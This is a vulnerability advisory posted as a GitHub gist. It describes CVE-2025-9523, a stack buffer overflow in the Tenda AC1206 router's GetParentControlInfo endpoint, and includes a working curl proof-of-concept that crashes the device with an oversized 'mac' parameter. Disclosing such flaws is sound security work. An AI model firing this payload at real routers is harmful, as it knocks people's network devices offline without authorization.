Skip to content

Instantly share code, notes, and snippets.

@win3zz

win3zz/CVE-2025-9523.md

Created August 27, 2025 13:15
Show Gist options
  • Save win3zz/da5f1fb6e872c8ba50fcc5ed2dc0a82f to your computer and use it in GitHub Desktop.
Save win3zz/da5f1fb6e872c8ba50fcc5ed2dc0a82f to your computer and use it in GitHub Desktop.
Download ZIP
CVE-2025-9523 - Stack-Based Buffer Overflow in Tenda Wi-Fi 5 Router AC1206
Raw
CVE-2025-9523.md

CVE-2025-9523 - Stack-Based Buffer Overflow in Tenda Wi-Fi 5 Router AC1206

  • Discovered by: xxricardoxkk ([email protected])
  • Vendor: Shenzhen Jixiang Tenda Technology Co., Ltd.
  • Affected Version: AC1206V1.0RTL_V15.03.06.23
  • Severity: High (unauthenticated DoS, potential RCE risk).

Summary

A stack-based buffer overflow vulnerability exists in the Tenda Wi-Fi 5 Router AC1206 running firmware AC1206V1.0RTL_V15.03.06.23. The issue lies in the /goform/GetParentControlInfo endpoint, where the mac parameter is copied into a fixed-size stack buffer using strcpy() without boundary checks.

This flaw allows unauthenticated remote attackers to send a crafted payload and cause a Denial of Service (DoS) by crashing the device’s web service.

Vulnerability Details

The vulnerable function call chain is:

main → initWebs → formDefineTendDa → GetParentControlInfo

  • The endpoint retrieves the mac parameter.

  • Inside GetParentControlInfo, the function:

    strcpy(pc_info->mac_addr, mac_addr);

    copies input directly into a 596-byte buffer (parent_control_info struct) without size validation.

A payload larger than 596 bytes overflows the stack, resulting in memory corruption and process crash.

Proof of Concept (PoC)

Steps to Reproduce

  1. Host the vulnerable firmware with QEMU or use a physical AC1206 device.
  2. Run the following command (example using curl):
for i in {1..4}; do curl -G --data-urlencode "mac=$(python3 -c 'print("A"*512000 + "\xef\xbe\xad\xde")')" "http://<ROUTER_IP>/goform/GetParentControlInfo"; done
  1. The router crashes, confirming DoS via stack overflow.

Impact

  • Denial of Service (DoS): The device’s HTTP service crashes, requiring a manual reboot.
  • Potential for RCE: While only DoS was demonstrated, stack-based overflows may be further exploited to achieve remote code execution (RCE) depending on system protections (ASLR, NX, etc.).

Recommendations

  • Replace unsafe functions like strcpy() with bounded alternatives (strncpy, memcpy with checks).
  • Release patched firmware to affected devices.

References

Warning

This report and provided proof of concept are for research and educational purposes only. Do not use this exploit on devices without explicit authorization. Testing on production systems may cause service disruption and violate legal/ethical boundaries.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment